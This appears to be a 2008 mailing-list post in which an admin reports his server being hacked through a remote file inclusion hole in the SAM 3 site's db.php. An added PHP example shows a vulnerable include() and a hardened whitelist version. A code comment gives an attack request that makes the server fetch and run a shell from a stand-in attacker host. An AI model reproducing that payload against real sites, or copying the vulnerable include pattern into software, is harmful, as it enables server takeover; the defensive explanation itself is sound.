Just so everyone knows, this is not a theoretical vuln. My server was hacked 5 days ago (fortunately minimally), and a couple of eggdrop (IRC relay) programs were installed along with some extraneous PHP files (baca.php). It was fairly easily detected and cleaned up, but I tracked it back to db.php, which was being used. I renamed the file (which of course stopped the web site) and then cleaned up.

The basic premise is that the common setting is passed a URL of a site with a PHP text file. This file is parsed and run on the local system and displays a web page (in PHP) with a command-line area. From there it's a simple matter of issuing FTP requests and installing web (PHP or Perl) apps. The user has access at the level that the web server is running at. This was a slightly modified version of the SAM 3 default site, so the exploit's been there for a while, but it is now known and hackers are actively looking for it. Google is really helpful in that respect, based on the referrer listing just before the hack.

Fortunately, my firewall blocked most of what they were trying to do (IRC bot relay and spam generation triggered by the bot), as I disallow IRC from all machines and SMTP is only available from the main server.


Roy Pait
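The include-a-URL pattern described in the post above, shown as an added example that is not code from the SAM 3 default site or from the post: the vulnerable form beside a hardened form. The parameter name `page`, the `pages/` directory, and the `load_page_*` function names are assumptions for illustration; the post only says that a "common setting" in db.php receives a URL that PHP then fetches and executes.

```php
<?php
// Added example, not code from the SAM 3 site or from the mailing-list post.
// 'page', the pages/ directory and the function names are assumptions.

// --- Vulnerable pattern: remote file inclusion (RFI) ---
// include/require accept any stream wrapper. With allow_url_include=On
// (on PHP before 5.2, allow_url_fopen=On was enough), PHP fetches the URL
// and executes whatever the remote server returns, as the web-server user.
// A request such as  ?page=http://attacker.example/shell.txt  is all it takes.
function load_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'default';
    include $page;   // attacker-controlled string reaches include()
}

// --- Hardened pattern: map untrusted input onto a fixed set of local files ---
// The request value is only ever used as a lookup key; no part of it becomes
// a path, so neither remote URLs nor ../ traversal can reach include().
function load_page_safe(array $get): void
{
    $allowed = [
        'default' => __DIR__ . '/pages/default.php',
        'news'    => __DIR__ . '/pages/news.php',
    ];
    $key = $get['page'] ?? 'default';
    if (!is_string($key) || !array_key_exists($key, $allowed)) {
        http_response_code(404);
        exit('unknown page');
    }
    include $allowed[$key];
}

// Defence in depth, independent of the code: disable URL includes server-wide
// in php.ini (or per-directory where the host allows it):
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; if nothing legitimately needs remote fopen
load_page_safe($_GET);
```

The important check is that the string from the request never becomes the include path; the whitelist key is the only thing the client controls. Turning `allow_url_include` off is worth doing as well, because it protects any other include site in the application that has not been audited yet.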

>>> "James Henline" <[email protected]> 1/9/2008 9:36 AM >>>
Please see the following news article for more information. 

http://www.spacialaudio.com/news/index.html?newsID=151 
